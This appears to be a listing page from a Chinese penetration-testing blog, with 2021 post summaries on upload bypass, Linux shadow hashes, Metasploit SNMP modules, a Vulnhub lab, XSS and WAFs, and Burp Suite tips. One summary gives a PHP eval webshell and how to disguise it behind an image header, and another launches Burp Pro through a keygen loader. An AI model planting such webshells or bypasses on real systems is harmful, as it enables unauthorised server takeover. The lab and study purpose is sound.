路漫漫其修远兮,吾将上下而求索

导航

上一页 1 ··· 10 11 12 13 14 15 16 17 18 ··· 36 下一页

2021年6月28日 #

php一句话图片马上传绕过

摘要: 主页 burpsuite截获,修改后缀为php,末尾加上一句话马(内容开头一定要是图片文件标志头),上传成功并返回路径 <?php @eval($_POST['c']);?> 其他测试: 1、删掉部分图片内容时(图片文件头不对),无法上传 2、可以修改图片文件头为gif文件的标志头:GIF87a或者 阅读全文

posted @ 2021-06-28 14:01 爱在西元间 阅读(2714) 评论(0) 推荐(0) 编辑

2021年6月25日 #

linux口令文件shadow加密复现

摘要: 创建测试账号abc,口令abcdefg useradd abcpasswd abc cat /etc/shadow 查看系统生成的口令 abc:$6$IIxEKxve$fRj6OFj7I4SqgdN6fVTFOHt8UVLpBNN50QbYp4MrS9SuX2Zi/J8qfDhfdRepQF4gBB 阅读全文

posted @ 2021-06-25 17:10 爱在西元间 阅读(243) 评论(0) 推荐(0) 编辑

linux系统使用screen工具恢复断开的会话

摘要: 服务器环境是Debian 初次需要下载安装 apt-get install screen 所有参数 Use: screen [-opts] [cmd [args]] or: screen -r [host.tty] Options: -4 Resolve hostnames only to IPv4 阅读全文

posted @ 2021-06-25 16:58 爱在西元间 阅读(464) 评论(0) 推荐(0) 编辑

snmp协议漏洞的msf利用

摘要: 利用msf的snmp扫描模块 use auxiliary/scanner/snmp/snmp_login options 看下选项,填ip即可,端口默认161set rhosts ip run use auxiliary/scanner/snmp/snmp_enumoptionsset rhosts 阅读全文

posted @ 2021-06-25 10:35 爱在西元间 阅读(751) 评论(0) 推荐(0) 编辑

2021年6月9日 #

burpsuite Intruder结果导出为excel

摘要: 阅读全文

posted @ 2021-06-09 13:18 爱在西元间 阅读(875) 评论(0) 推荐(0) 编辑

2021年6月7日 #

Vulnhub靶场presidential1靶场

摘要: vmware中配置桥接模式,自动获取外网卡同网段ip地址 用nmap扫描同网段设备ip,发现192.168.1.250 继续用nmap扫描端口,一开始用-sV参数没找到,换成-sS后发现80和2082端口 nmap -sS -p0-65535 192.168.1.250 访问web看看 用dirse 阅读全文

posted @ 2021-06-07 22:33 爱在西元间 阅读(106) 评论(0) 推荐(0) 编辑

2021年5月29日 #

chrome控制台利用console.log输出CSS样式

摘要: 123 console.log('%c 你看 ','color:red;font-size:5em;background-color:yellow'); // 3D Text console.log("%c3D Text"," text-shadow: 0 1px 0 #ccc,0 2px 0 #c 阅读全文

posted @ 2021-05-29 01:28 爱在西元间 阅读(388) 评论(0) 推荐(0) 编辑

2021年5月11日 #

云waf对反射型xss的拦截

摘要: 阅读全文

posted @ 2021-05-11 11:38 爱在西元间 阅读(81) 评论(0) 推荐(0) 编辑

2021年4月29日 #

关于Burpsuite Intruder模块Attack type的使用举例

摘要: 第三种模式 Pitchfork用例: 假如要抓取多个页面,规律为0-40页、41-81页、82-122页等等 需要设置这两个payload位置,并且每次attack使用一对payload(0和40、41和81、82和122等等,依次对应) 如下设置: payload生成可以用for循环: for / 阅读全文

posted @ 2021-04-29 01:06 爱在西元间 阅读(258) 评论(0) 推荐(0) 编辑

2021年4月26日 #

burp用命令行一键启动出现错误“a java exception has occurred”的解决

摘要: burp用命令行一键启动出现错误“a java exception has occurred”的解决 看下命令行是这句: javaw -Xmx1024m -noverify -Xbootclasspath/p:burp-loader-keygen.jar -jar burpsuite_pro_v2. 阅读全文

posted @ 2021-04-26 14:20 爱在西元间 阅读(4039) 评论(0) 推荐(0) 编辑

上一页 1 ··· 10 11 12 13 14 15 16 17 18 ··· 36 下一页